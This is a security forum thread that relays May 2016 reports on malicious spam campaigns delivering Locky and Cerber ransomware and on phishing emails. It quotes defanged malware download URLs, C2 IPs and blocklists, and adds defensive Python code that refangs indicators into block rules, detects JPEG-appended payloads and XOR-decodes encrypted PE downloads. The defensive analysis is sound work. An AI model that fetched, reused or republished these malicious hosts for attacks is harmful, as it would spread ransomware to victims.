SPAM frauds, fakes, and other MALWARE deliveries...



#1726 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • 10,472 posts

Posted 25 May 2016 - 07:09 AM

FYI...

Fake 'invoices' SPAM - malicious attachment
- http://blog.dynamoo....wing-phone.html
25 May 2016 - "These -fake- financial spams come from different companies, all with a malicious attachment.
    From:    Frank.ClaraZO@ pr-real .com
    Date:    25 May 2016 at 11:34
    Subject:    The invoices from INCHCAPE PLC
    Hello,
    Following the phone conversation with the accounting department represantatives I'm sending you the invoices.
    Thank you for attention,
    Kind regards
    Clara Frank
    INCHCAPE PLC ...
    > Sent from Iphone


Attached is a ZIP file with a name similar to Invoice 5044-032841.zip which in turn contains a malicious script named in a similar manner to invoice(677454).js which typically has a detection rate of 3/56*. Hybrid Analysis** of that sample shows the script creating a PFX (personal certificate) file which is then transformed into a PIF (executable) file using the certutil.exe application. This PIF file itself has a detection rate of 6/56*** but automated analysis [1] [2].. is inconclusive. The behaviour is somewhat consistent with the Dridex banking trojan but may possibly be Locky ransomware."
* https://virustotal.c...sis/1464173596/

** https://www.hybrid-a...vironmentId=100

*** https://virustotal.c...sis/1464174246/

1] https://malwr.com/an...2I4YTNkNTIwZTY/

2] https://www.hybrid-a...vironmentId=100
___

Fake 'Operational Expense' SPAM - leads to Locky
- http://blog.dynamoo....ense-leads.html
25 May 2016 - "This -fake- financial spam leads to malware:
    From:    Theodora Hamer
    Date:    25 May 2016 at 12:17
    Subject:    Operational Expense
    Operational Expense of 7,350,80 USD has been credited from your account. For more details please refer to the report that can be found down below


This analysis is based on a trusted source (thank you!). Attached is a ZIP file containing a malicious script, downloading from:
alborzcrane .com/g1slEn.exe
alborzcrane .com/Z94n5r.exe
alintagranito .com/fOA8Bl.exe
alintagranito .com/xB7nku.exe
amazoo.com .br/R0koId.exe
avayeparseh .com/s0faxS.exe
buzzimports .com.au/cRQVC4.exe
buzzimports .com.au/ECScwi.exe
galabel .com/lRkuJX.exe
galabel .com/oQz26K.exe
jett .com/6APaSk.exe
kitchen38 .com/HYPETS.exe
kitchen38 .com/V1ygc2.exe
onestopcableshop .com/J7t6au.exe
osdc .eu/gct5TH.exe
osdc .eu/n2UuEj.exe
purfectcar .com/9OaoqM.exe
purfectcar .com/sHXqZT.exe
wisebuy .com/WiOqzB.exe
yearnjewelry .com/OnvBrc.exe
yearnjewelry .com/t8HnK3.exe
zhaoyk .com/Dmv3As.exe
zhaoyk .com/JbO9uX.exe
This drops what is apparently Locky ransomware, with a detection rate of 3/56*. This phones home to:
164.132.40.47 (OVH, France)
104.131.182.103 (Digital Ocean, US)
This Hybrid Analysis** shows the Locky ransomware in action.
Recommended blocklist:
164.132.40.47
104.131.182.103
"
* https://virustotal.c...5cf88/analysis/

** https://www.hybrid-a...vironmentId=100
___

Fake 'URGENT - DELIVERY' SPAM - leads to malware
- http://blog.dynamoo....very-jobin.html
25 May 2016 - "This -fake- delivery spam leads to malware:
    From:    Justin harmon
    Date:    25 May 2016 at 12:30
    Subject:    URGENT - DELIVERY
    Dear customer.
    Please find the attachment.
    Thanks & Best Regards
    Jobin Jacob
    HYTEX ...


Attached is a ZIP file that contains one of many scripts that downloads a binary from one of the following locations (according to a trusted third party, thank you!):
avi-vest .ro/3g34t3t4tggrt?[random-string]=[random-string]
bankruptcymag .com/3g34t3t4tggrt?[random-string]=[random-string]
bizconsulting .ro/3g34t3t4tggrt?[random-string]=[random-string]
brunohenrique .net/3g34t3t4tggrt?[random-string]=[random-string]
cjglobal .co/3g34t3t4tggrt?[random-string]=[random-string]
comecomunicare .eu/3g34t3t4tggrt?[random-string]=[random-string]
crimeshurt .com/3g34t3t4tggrt?[random-string]=[random-string]
digitacaoveloz .com.br/3g34t3t4tggrt?[random-string]=[random-string]
globalcredithub .com/3g34t3t4tggrt?[random-string]=[random-string]
lifeclinics .net/3g34t3t4tggrt?[random-string]=[random-string]
orobos .nyc/3g34t3t4tggrt?[random-string]=[random-string]
selonija .lv/3g34t3t4tggrt?[random-string]=[random-string]
smp.com .mx/3g34t3t4tggrt?[random-string]=[random-string]
sweethomesgroup .com/3g34t3t4tggrt?[random-string]=[random-string]
tspipp .tsu.tula .ru/3g34t3t4tggrt?[random-string]=[random-string]
unijovem .com.br/3g34t3t4tggrt?[random-string]=[random-string]
www .appoutpost .com/3g34t3t4tggrt?[random-string]=[random-string]
Where [random-string] seems to be a random alphanumeric string. The dropped binary is Locky ransomware (as seen in this Malwr report*) which phones home to:
164.132.40.47 (OVH, France)
104.131.182.103 (Digital Ocean, US)
These are the same C2 servers as found here**."
* https://malwr.com/an...DVkY2VlZjkwYmM/
Hosts
2.49.203.206
164.132.40.47


** http://blog.dynamoo....ense-leads.html
___

Fake 'Weekly report' SPAM - malicious attachment
- http://blog.dynamoo....lease-find.html
25 May 2016 - "This -fake- financial spam comes from random senders and companies and has a malicious attachment:
    From:    Alicia Ramirez
    Date:    25 May 2016 at 14:22
    Subject:    Weekly report
    Hi [redacted],
    Please find attached the Weekly report.
    King regards,
    Alicia Ramirez
    Castle (A.M.) & Co.


There are a -large- number of these, with a ZIP file -attached- containing malicious scripts with a typical detection rate of 3/56*. In this sample Malwr** analysis, it downloads a file from:
test.glafuri .net/yxk6s
There will certainly be a LOT of other download locations. The dropped file GSKQtcnNu8MS.exe has a detection rate of 4/55*** and that same VirusTotal report indicates C2 traffic to:
138.201.93.46 (Hetzner, Germany)
91.200.14.139 (PP SKS-LUGAN, Ukraine)
104.131.182.103 (Digital Ocean, US)
164.132.40.47 (OVH, France)
Even though other automated analysis -failed- [1] [2] this time we have previously identified -two- of those IPs[3] as being Locky ransomware, so there is little doubt that this will be more of the same.
Recommended blocklist:
138.201.93.46
91.200.14.139
104.131.182.103
164.132.40.47
"
* https://virustotal.c...5b177/analysis/

** https://malwr.com/an...DQzN2IzM2JmMWY/
Hosts
176.223.121.193

*** https://virustotal.c...b5f47/analysis/
TCP connections
138.201.93.46
91.200.14.139
104.131.182.103
164.132.40.47
69.195.129.70


1] https://www.hybrid-a...vironmentId=100

2] https://malwr.com/an...mFiYjM2NTg0Mzc/

3] http://blog.dynamoo....ense-leads.html
___

Fake 'Pan Card' SPAM - delivers Locky
- https://myonlinesecu...delivers-locky/
25 May 2016 - "An email with the subject of 'Pan Card' pretending to come from email2jbala . <email2jbala@ gmail .com> with a malicious word doc attachment downloads Locky ransomware... 'never heard of a 'PAN card' and had to do a Google search to find out what it is. 'Turns out to be an Indian Identity card for income tax payments... The email looks like:
From: email2jbala . <email2jbala@igmail .com>
Date: Wed 25/05/2016 15:37
Subject: Pan Card
Attachment: 2015-25-05_333317.docm
    Attached is the PAN card as requested.
    You can mail me form 16.


25 May 2016: 2015-25-05_333317.docm - Current Virus total detections 7/55*
.. MALWR** shows a download from
 http ://www.asysa .cl/k7jhrt4hertg which gave the hendibe.exe which doesn’t look like an .exe file but is an HTML file (VirusTotal 0/57***) (Currently giving me a 404 'not found'). An alternative version gave me
 http ://majaz .co.uk/k7jhrt4hertg (VirusTotal 6/56[4]) which is the same Locky ransomware version from earlier today[5]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1464187080/

** https://malwr.com/an...WI5YTFjY2M5YzU/
Hosts
186.67.227.204

*** https://www.virustot...sis/1464191429/

4] https://www.virustot...sis/1464189317/
TCP connections
164.132.40.47

5] https://myonlinesecu...delivers-locky/

asysa .cl: 186.67.227.204: https://www.virustot...04/information/
>> https://www.virustot...fd834/analysis/
majaz .co.uk: 81.27.85.11: https://www.virustot...11/information/
>> https://www.virustot...2173a/analysis/
___

'WhatsApp Gold' SCAM -  spreads malware
- http://www.actionfra...s-malware-may16
24 May 2016 - "WhatsApp users are being tricked by fraudsters into downloading a -fake- version of WhatsApp which infects Android devices with malware. The "secret" messages sent to people's inboxes claim you have an exclusive chance to download “WhatsApp Gold”. The scam messages claim to offer enhanced features used by celebrities. Victims are urged to sign up via-a-link-provided... After clicking-on-the-link you will be -redirected- to a -fake- page and your Android device will become infected with malware. If you have already followed the link to download the software, install some -antivirus- software onto your device to remove the malware..."
> https://www.helpnets...p-gold-malware/
May 25, 2016 - "... messages that offer 'WhatsApp Gold'..." [which does NOT exist.]
 



Edited by AplusWebMaster, 25 May 2016 - 11:09 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.
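Added example, not part of the post above or of the dynamoo / myonlinesecurity write-ups it quotes: the quoted reports defang their indicators with a space before the TLD dot ("alborzcrane .com") and inside "http ://". The script below refangs that style, sorts the result into C2 IPs, download hosts and download URLs (dropping the random query strings such as ?[random-string]=[random-string]), de-duplicates them, and renders the lot as outbound iptables drops plus hosts-file sinkhole entries. SAMPLE_POST is a constructed snippet in the same style, the rule formats are my choice, and the file-extension heuristic that keeps bare file names like hendibe.exe out of the host list is an assumption.

```python
import re
from typing import Dict, List

# Constructed sample in the defanged style used in the quoted reports (space before
# the TLD dot, space inside "http ://"); not a complete copy of any one list above.
SAMPLE_POST = """\
alborzcrane .com/g1slEn.exe
amazoo.com .br/R0koId.exe
 http ://www.asysa .cl/k7jhrt4hertg
avi-vest .ro/3g34t3t4tggrt?[random-string]=[random-string]
164.132.40.47 (OVH, France)
104.131.182.103 (Digital Ocean, US)
Recommended blocklist:
164.132.40.47
"""

IPV4_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})\b")
HOST_RE = re.compile(r"^(?:https?://)?([a-z0-9-]+(?:\.[a-z0-9-]+)*\.[a-z]{2,})(/\S*)?$", re.I)
# Heuristic (assumption): a bare token ending in one of these is a file name, not a host.
FILE_EXTS = {"exe", "zip", "js", "scr", "pif", "docm", "dot", "rtf", "pdf"}


def refang(line: str) -> str:
    """Reverse the defanging used in the quoted reports."""
    s = line.strip()
    s = re.sub(r"^(https?)\s*:\s*//", r"\1://", s, flags=re.I)  # "http ://" -> "http://"
    s = re.sub(r"\s+\.", ".", s)                                   # "foo .com"  -> "foo.com"
    return s


def valid_ipv4(ip: str) -> bool:
    return all(0 <= int(octet) <= 255 for octet in ip.split("."))


def parse_iocs(text: str) -> Dict[str, List[str]]:
    """Extract unique IPs, host names and download URLs (query strings dropped)."""
    iocs: Dict[str, List[str]] = {"ips": [], "hosts": [], "urls": []}

    def add(kind: str, value: str) -> None:
        if value not in iocs[kind]:
            iocs[kind].append(value)

    for raw in text.splitlines():
        s = refang(raw)
        if not s:
            continue
        m = IPV4_RE.match(s)
        if m:
            if valid_ipv4(m.group(1)):
                add("ips", m.group(1))      # trailing "(OVH, France)" is ignored
            continue
        m = HOST_RE.match(s)
        if not m:
            continue
        host, path = m.group(1).lower(), m.group(2)
        if host.rsplit(".", 1)[-1] in FILE_EXTS:
            continue
        add("hosts", host)
        if path:
            add("urls", "http://" + host + path.split("?", 1)[0])
    return iocs


def egress_rules(iocs: Dict[str, List[str]]) -> List[str]:
    """Render the indicators as iptables drop rules plus hosts-file sinkhole entries."""
    rules = [f"-A OUTPUT -d {ip} -j DROP" for ip in iocs["ips"]]
    rules += [f"0.0.0.0 {host}" for host in iocs["hosts"]]
    return rules


if __name__ == "__main__":
    for rule in egress_rules(parse_iocs(SAMPLE_POST)):
        print(rule)
```

The download hosts are mostly compromised legitimate sites, so sinkholing them is a short-lived measure; the C2 IPs are the indicators worth keeping in a perimeter blocklist, which is also what the quoted "Recommended blocklist" entries contain.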



#1727 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • Authentic Member
  • PipPipPipPipPipPipPip
  • 10,472 posts
  • Interests:... The never-ending battle for Truth, Justice, and the American way.

Posted 26 May 2016 - 05:27 AM

FYI...

Fake 'document' SPAM - malicious attachment
- http://blog.dynamoo....d-attached.html
26 May 2016 - "This spam appears to come from different companies and senders, and has a malicious attachment:
    From:    Sara Osborne
    Date:    26 May 2016 at 10:53
    Subject:    RE:
    Dear sales,
    Please find attached a document containing our responses to the other points which we
    discussed on Monday 23th May.
    Please let me know if you have any queries
    Regards,
    Wayfair Inc.
    Sara Osborne


Attached is a ZIP file (the ones I have seen so far all begin with responses_) which contains a malicious script name in a similar way to employees -382-.js. These have a typical detection rate of 4/56*. Two samples analysed by Malwr [1] [2] show download locations from:
newgeneration2010 .it/mkc27f
projectodetalhe .pt/do5j36a
There will be many other download locations too. These drop two different binaries (VirusTotal results [3] [4]). Those two VT results plus these two DeepViz analyses [5] [6] show the malware phoning home to:
138.201.93.46 (Hetzner, Germany)
107.181.187.12 (Total Server Solutions, US)
212.109.219.31 (JSC Server, Russia)
5.152.199.70 (Redstation, UK)
This behaviour is consistent with Locky ransomware.
Recommended blocklist:
138.201.93.46
107.181.187.12
212.109.219.31
5.152.199.70
"
* https://virustotal.c...sis/1464257175/

1] https://malwr.com/an...jJhN2Q5N2ZkYWE/
Hosts
217.73.226.220

2] https://malwr.com/an...2M4YjM5YjE0Nzg/
Hosts
50.87.30.230

3] https://virustotal.c...sis/1464258206/
TCP connections
138.201.93.46

4] https://virustotal.c...sis/1464258217/
TCP connections
212.109.219.31

5] https://sandbox.deep...e3cfcac4596264/

6] https://sandbox.deep...ae92a895d04552/
___

Fake 'document' SPAM - jpg embedded malware
- https://myonlinesecu...bedded-malware/
26 May 2016 - "A series of emails spoofing different companies with the subject of 'I/we have attached the [document/file/declaration]' from [random company name] coming from random senders with a malicious word doc attachment is another one from the current bot runs... Other subject lines include:
    Please review the attached relation from
Some of the alleged senders with compromised email address I have received from include:
    Nec Consulting <audiovideo7@ yandex .com>
    Turpis Inc. <rahul_k@ asus .com>
    Pharetra Sed Consulting <dibyendu@ digitexwebitsolutions .com>
    Aliquet Proin Velit Inc. <jdybala@ realmindhosting .com>
    Lobortis Corporation <apayne@ msicorp .com>

The email looks like:
From: Nec Consulting <audiovideo7@ yandex .com>
Date: Thu 26/05/2016 05:06
Subject: I have attached the document from Nec Consulting.
Attachment: 2-7925_273378123.dot
    I have attached the document from Nec Consulting.


26 May 2016: 2-7925_273378123.dot - Current Virus total detections 4/57*
.. Payload security** shows a download from 3dcadtools .com/img.jpg?FL=1 (VirusTotal 4/56***) which gives a proper jpg that contains embedded malware... will update later when one of the analysts has done it.
Screenshot of image: https://myonlinesecu...2016/05/jpg.png
.. DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1464239384/

** https://www.hybrid-a...vironmentId=100
Contacted Hosts
208.66.129.67: https://www.virustot...67/information/

*** https://www.virustot...sis/1464242851/

3dcadtools .com: 208.66.129.67
___

Fake 'Summons' SPAM - delivers Locky
- https://myonlinesecu...cky-ransomware/
26 May 2016 - "... An email with the subject of 'Summons On The Case #4E459E46' [random numbered] pretending to come from random senders with a zip attachment containing a JavaScript file which downloads Locky. It downloads the same Locky version from the -same- locations described by Techhelplist[1]. So far he has found 150-odd download locations for this version. It should be noted that these JavaScript files have 2 encrypted download locations in them...
1] https://techhelplist...eclined-malware
26 May 2016 - "... Checks in with these C2 sites:
212.109.219.31: https://www.virustot...31/information/
>> https://www.virustot...22759/analysis/
5.152.199.70: https://www.virustot...70/information/
>> https://www.virustot...01971/analysis/
107.181.187.12: https://www.virustot...12/information/
>> https://www.virustot...96cc3/analysis/
 ..."
One of the emails looks like:
From: Faye Third <ThirdFaye15@ booneritterinsurance .com>
Date: Thu 26/05/2016 17:02
Subject: Summons On The Case #4E459E46
Attachment: copy_260713.zip
    Good day, You are being summonsed to the court on the case #4E459E46. The penalty in the amount of $9,793,18 will be assigned in case you don’t show up. Information on the case is listed in the document enclosed.


This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
___

'Telegraphic transfer' - Phish
- http://blog.dynamoo....elegraphic.html
26 May 2016 - "At first glance this spam looks like malware, but it appears to be a -phish- instead:
    From:    General trading ltd [info@ 7studio .co]
    Date:    26 May 2016 at 05:04
    Subject:    Payment
    Dear Sir/Ma'am!
    As requested by our customer
    Please find attached telegraphic transfer copy for payment made to your account today.
    Kindly confirm once you received this payment.
    Regards
    Muhammad Farooq
    Exchange Manager,
    MCB New Garden Exchange
    U.A.E (1080) ...


Attached is a file TT-USD.pdf .. as a rule I would recommend -not- opening PDF files or other attachments from -unknown- sources. When you open the file it looks like this:
> https://2.bp.blogspo...0/pdf-phish.jpg

Yes, it does look that blurry. The enticement here is to click-the-link in the document, which is something I wouldn't recommend that you do because it could lead to a malicious download, exploit kit or in this case a simple phishing page hosted on poloimport2012 .com:
> https://4.bp.blogspo...pdf-phish-2.jpg

poloimport2012 .com: 192.185.214.25: https://www.virustot...25/information/
>> https://www.virustot...7f752/analysis/

This seems to be phishing for general webmail credentials. Of course, once a hacker has those they can use your account to send spam or even rifle through your private emails and reset passwords and gain access to other important accounts. Signing in with any credentials appears to fail*, but of course the bad guys have just harvested your password..
* https://3.bp.blogspo...pdf-phish-3.jpg
.. I don't recommend opening files like this and clicking-links to see where they go. I use a test environment to do this, but some similar spam emails can deliver malware that will silently plant itself on your computer which can be even more dangerous than this phish."
___

Fake 'new fax' SPAM - ransomware
- https://myonlinesecu...livers-malware/
25 May 2016 - "An email with the subject of 'You have received a new fax' pretending to come from Incoming Fax <Incoming.Fax@ victim domain .tld> with a zip attachment is another one from the current bot runs which delivers some malware... Edit: I am being told it is cerber ransomware:
> http://www.bleepingc...-speaks-to-you/
One of the emails looks like:
From: Incoming Fax <Incoming.Fax@ victim domain .tld>
Date: Wed 25/05/2016 19:27
Subject: You have received a new fax
Attachment: IncomeMessage.zip
    You have received fax from XEROX41733530 at thespykiller .co.uk
    Scan date: Wed, 25 May 2016 10:26:43 -0800
    Number of page(s): 15
    Resolution: 400×400 DPI
    Name: Fax5704504
    Attached file is scanned image in PDF format.


25 May 2016: IncomeMessage.zip: Extracts to: IncomeMessage127286.scr - Current Virus total detections 3/57*
.. MALWR** shows some strange data files created/dropped by this that I assume need decrypting into an exe file. It also drops opencandy.dll, whether this is connected with the Open Candy adware or is just a coincidental name is open for discussion... Payload Security*** tells us it contacts 1 domain and -16385- hosts. View the network section[1] for more details... being told it is cerber ransomware... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464200261/

** https://malwr.com/an...WQzYTVjYjUxYmU/

*** https://www.hybrid-a...vironmentId=100
Contacted Hosts
ipinfo .io: 54.93.140.37: https://www.virustot...37/information/

1] https://www.hybrid-a...network-traffic
 



Edited by AplusWebMaster, 26 May 2016 - 12:28 PM.

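Added example, not from the post above or the reports it quotes: two of the observations in it are about content that does not match its name, a "proper jpg that contains embedded malware" (3dcadtools .com/img.jpg) and an .exe download that "is an HTML file". The code below sniffs a downloaded blob by its leading bytes regardless of name or Content-Type, then walks the JPEG marker structure to find the EOI marker and reports how many bytes follow it, which is the generic signal for an image used as a carrier. The sample bytes (a minimal one-scan JPEG, the same image with a fake PE appended in cleartext, and a 404 page served as an "exe") are constructed here; real carriers usually hold the payload encrypted, so the trailing-byte count is the reliable indicator and the MZ check is only a convenience for the cleartext case.

```python
DOS_STUB = b"This program cannot be run in DOS mode"


def sniff(data: bytes) -> str:
    """Classify a blob by content, ignoring the file name or Content-Type it came with."""
    if data[:2] == b"MZ":
        return "pe"
    if data[:2] == b"\xff\xd8":
        return "jpeg"
    head = data[:512].lstrip().lower()
    if head.startswith((b"<!doctype html", b"<html", b"<head", b"<body")):
        return "html"
    return "unknown"


def jpeg_end_offset(data: bytes) -> int:
    """Offset just past the EOI marker, or -1 if the data is not a well-formed JPEG."""
    if not data.startswith(b"\xff\xd8"):
        return -1
    pos, n = 2, len(data)
    while pos + 2 <= n:
        if data[pos] != 0xFF:
            return -1                      # expected a marker here
        marker = data[pos + 1]
        if marker == 0xFF:                 # fill byte
            pos += 1
            continue
        if marker == 0xD9:                 # EOI
            return pos + 2
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:
            pos += 2                       # stand-alone markers carry no length
            continue
        if pos + 4 > n:
            return -1
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if seg_len < 2:
            return -1
        pos += 2 + seg_len
        if marker == 0xDA:                 # SOS: skip entropy-coded data to the next real marker
            while pos + 1 < n:
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    return -1                              # ran off the end without an EOI


def triage_image(data: bytes) -> dict:
    """Summarise whether a supposed image is structurally a JPEG and what follows it."""
    end = jpeg_end_offset(data)
    trailing = data[end:] if end >= 0 else b""
    return {
        "kind": sniff(data),
        "well_formed_jpeg": end >= 0,
        "trailing_bytes": len(trailing),
        "trailing_has_pe": trailing[:2] == b"MZ" or DOS_STUB in trailing,
    }


# Constructed samples: a minimal JPEG (APP0 + one scan + EOI), the same image with a
# fake PE appended after EOI, and an "exe" download that is really an HTML 404 page.
def _segment(marker: bytes, payload: bytes) -> bytes:
    return marker + (len(payload) + 2).to_bytes(2, "big") + payload


CLEAN_JPEG = (b"\xff\xd8"
              + _segment(b"\xff\xe0", b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
              + _segment(b"\xff\xda", b"\x01\x01\x00\x00\x3f\x00")
              + b"\x12\x34\xff\x00\x56"   # entropy-coded data containing a stuffed FF 00
              + b"\xff\xd9")
JPEG_WITH_PAYLOAD = CLEAN_JPEG + b"MZ\x90\x00" + b"\x00" * 60 + DOS_STUB
HTML_AS_EXE = b"<html><body><h1>404 Not Found</h1></body></html>"

if __name__ == "__main__":
    for name, blob in (("img.jpg", CLEAN_JPEG), ("carrier.jpg", JPEG_WITH_PAYLOAD),
                       ("hendibe.exe", HTML_AS_EXE)):
        print(name, triage_image(blob))
```

A proxy or sandbox rule built on this should treat any non-zero trailing_bytes on a JPEG fetched by an Office process or a script host as suspicious on its own, without waiting for the payload to be decoded.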


#1728 AplusWebMaster

Posted 27 May 2016 - 04:34 AM

FYI...

Ransomware - Free Tools
- http://free.antiviru...m/us/index.html
May 26, 2016 - "These free ransomware tools can help users who have been infected with certain versions of ransomware and crypto-ransomware, allowing them to regain access to their system and files..."
> Crypto-Ransomware File Decryptor Tool:
- https://esupport.tre...US/1114221.aspx
> Lock Screen Ransomware Tool - unavailable at this time - check back later.
___

Fake 'Information request' SPAM - delivers Locky
- https://myonlinesecu...delivers-locky/
27 May 2016 - "... an email with the subject of 'Information request' pretending to come from random senders with a zip attachment which downloads Locky ransomware... One of the emails looks like:
From: Damien Benson <BensonDamien52@ silvanasoda .com.br>
Date: Fri 27/05/2016 11:38
Subject: Information request
Attachment: changes_scan.910.zip
    Dear scan.910,
    As per our discussion yesterday, please find attached the amended meeting minutes.
    I have accepted the majority of the changes requested, however there are some that I have left in the document.
    I have included the edits as track changes.
    Please confirm that the changes we have made are acceptable.
    Many thanks
    Regards,
    Freshpet, Inc.
    Damien Benson ...


27 May 2016: changes_scan.910.zip: Extracts to: changes-4354-.js - Current Virus total detections 2/57*
.. MALWR** shows a download... from http ://genius-versand .de/n2e2n (VirusTotal 0/57***) which is another one of these malware that get downloaded as an encrypted text file that needs to be decrypted by the javascript (which is itself encrypted) to give a working .exe file and bypass antivirus & perimeter defences that block download of executable files. Payload security[4] gives us TC9ck9tl.exe (VirusTotal 7/57[5]). These all have anti analysis/Anti sandbox/VM protection to prevent analysis by security companies and researchers... This is another one of the files that unless you have “show known file extensions enabled“, can easily be mistaken for a genuine DOC/PDF/JPG or other common file instead of the .EXE/.JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1464345360/

** https://malwr.com/an...GNmMGY0MjIyNjA/
Hosts
78.46.53.123: genius-versand .de: https://www.virustot...23/information/
>> https://www.virustot...2efa7/analysis/

*** https://www.virustot...sis/1464346231/

4] https://www.hybrid-a...vironmentId=100
Contacted Hosts
78.46.53.123

5] https://www.virustot...sis/1464346123/
TCP connections
5.152.199.70: https://www.virustot...70/information/
>> https://www.virustot...01971/analysis/

- http://blog.dynamoo....discussion.html
27 May 2016 - "This spam leads to Locky ransomware:
    From:    Meagan Branch
    Date:    27 May 2016 at 12:35
    Subject:    Information request
    Dear [redacted],
    As per our discussion yesterday, please find attached the amended meeting minutes.
    I have accepted the majority of the changes requested, however there are some that I have left in the document.
    I have included the edits as track changes.
    Please confirm that the changes we have made are acceptable.
    Many thanks
    Regards,
    Oramed Pharmaceuticals Inc.
    Meagan Branch ...


The senders vary from email to email. Attached is a ZIP file with a malicious script, which in the examples that I have found downloads one of a variety of malicious executables [1] [2].. which call home to the -same- IP addresses found in this earlier spam run*.
1] https://virustotal.c...sis/1464345833/
TCP connections
5.152.199.70

2] https://virustotal.c...sis/1464345851/
TCP connections
193.9.28.13

* http://blog.dynamoo....-nr-746441.html
27 May 2016 - "... The payload is Locky ransomware.
Recommended blocklist:
193.9.28.13
5.152.199.70
212.109.219.31
107.181.187.12
"
___

'Final PO Contract' - Phish
- http://blog.dynamoo....ntractxlsx.html
27 May 2016 - "This spam email is phishing for email credentials. Unlike some, this one seems to be quite well done and might convince unsuspecting people that it is genuine.
    From:    M Tufail Shakir [admin@ ebookmalls .com]
    Date:    27 May 2016 at 08:42
    Subject:    Re: Final PO Contract..xlsx
    Please see below attachment for the final signed contract
    Regards,
    27-05-2016
    Tom Yip | Regional Sales Team | Marchon Eyewear (HK) Ltd...


The link in this email goes to:
cagselectrical .com.au/libraries/emb/excel/excel/index.php?email=[redacted]
This gives a pretty convincing looking facsimile of an Excel spreadsheet, prompting for credentials:
> https://2.bp.blogspo...excel-phish.jpg
Entering any combination of username and password seems to work, then you get -redirected- to a GIF of a spreadsheet:
> https://2.bp.blogspo...cel-phish-2.jpg
Curiously, this GIF is not part of a phishing site but is on a wholly legitimate site belonging to a software company called Aspera (you can see it here):
> http://download.aspe...html/index.html
The asperasoft .com domain is NOT involved in the phishing nor has it been compromised. As ever, I would advise you -not- to explore links like this as they might lead to an exploit kit or malware, and bear in mind that some phishing pages are better than others, and this is one of the more convincing ones that I have seen recently."

cagselectrical .com.au: 103.1.110.130: https://www.virustot...30/information/
>> https://www.virustot...59dbc/analysis/
___

'Window Users Award' - Phish
- https://myonlinesecu...t-lottery-scam/
27 May 2016 - "An email with the subject of 'Microsoft Window Users Award' pretending to come from Mr. Thomas Fisher <11@ nokopings .jp.tn> with a PDF attachment is a phishing scam... One of the emails looks like:
From: Mr. Thomas Fisher <11@ nokopings .jp.tn>
Date: Fri 27/05/2016 08:40
Subject:  Microsoft Window Users Award..,
Attachment: convert to microsoft.pdf


Screenshot: https://myonlinesecu...am-1024x550.png
 



Edited by AplusWebMaster, 27 May 2016 - 07:04 AM.

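Added example, not from the post above or the reports it quotes: the 'Information request' write-up describes a payload "downloaded as an encrypted text file that needs to be decrypted by the javascript ... to give a working .exe file and bypass antivirus & perimeter defences that block download of executable files". The post does not say what transform the script used; the code below assumes the commonest case in such downloaders, a short repeating-key XOR, and recovers the key from the blob alone using known plaintext: every PE starts with "MZ" and nearly every one carries the DOS stub string in its first few hundred bytes. It then verifies the result by checking the PE signature at e_lfanew rather than trusting the "MZ" alone. The key, the fake PE layout and the blob are constructed here; the script name and the real downloader's encoding are not known from the post.

```python
DOS_STUB = b"This program cannot be run in DOS mode"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """MZ header plus the PE signature at the e_lfanew offset stored at 0x3C."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_xor_key(blob: bytes, max_key_len: int = 16):
    """Known-plaintext recovery of a repeating XOR key of length 1..max_key_len.

    Each known plaintext byte at position p fixes key[p % klen].  For every key
    length and every candidate offset of the DOS stub, derive the key bytes and
    accept the first assignment that is consistent across all known bytes.
    Returns the key, or None if no consistent key exists.
    """
    for klen in range(1, max_key_len + 1):
        for off in range(0, len(blob) - len(DOS_STUB) + 1):
            known = [(0, ord("M")), (1, ord("Z"))]
            known += [(off + i, c) for i, c in enumerate(DOS_STUB)]
            key = [None] * klen
            consistent = True
            for pos, plain in known:
                kb = blob[pos] ^ plain
                j = pos % klen
                if key[j] is None:
                    key[j] = kb
                elif key[j] != kb:
                    consistent = False
                    break
            if consistent and None not in key:
                return bytes(key)
    return None


def carve_exe(blob: bytes):
    """Decode the blob if a consistent key yields a plausible PE; otherwise None."""
    key = recover_xor_key(blob)
    if key is None:
        return None
    decoded = xor_bytes(blob, key)
    return decoded if looks_like_pe(decoded) else None


# Constructed sample: a 144-byte stand-in for a PE (MZ header, e_lfanew -> 0x80,
# DOS stub at 0x40, PE signature at 0x80) encrypted with a 3-byte repeating key.
KEY = b"\x5a\x13\xc3"
_plain = bytearray(0x90)
_plain[0:2] = b"MZ"
_plain[0x3C:0x40] = (0x80).to_bytes(4, "little")
_plain[0x40:0x40 + len(DOS_STUB)] = DOS_STUB
_plain[0x80:0x84] = b"PE\x00\x00"
FAKE_PE = bytes(_plain)
ENCRYPTED_BLOB = xor_bytes(FAKE_PE, KEY)

if __name__ == "__main__":
    print("recovered key:", recover_xor_key(ENCRYPTED_BLOB))
    print("carved PE:", carve_exe(ENCRYPTED_BLOB) == FAKE_PE)
```

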